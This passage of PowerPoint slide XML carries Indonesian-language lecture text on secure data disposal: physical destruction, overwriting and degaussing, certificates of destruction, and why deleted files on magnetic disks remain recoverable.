              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di media, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghancuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merobek-robek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghancurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membakar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghancuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penimpaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> degaussing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> magnet pada media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penonaktifan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disalahgunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sanitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perolehan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sanitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihancurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tuntas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterlibatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>File yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hard disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>magnetik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikandungnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
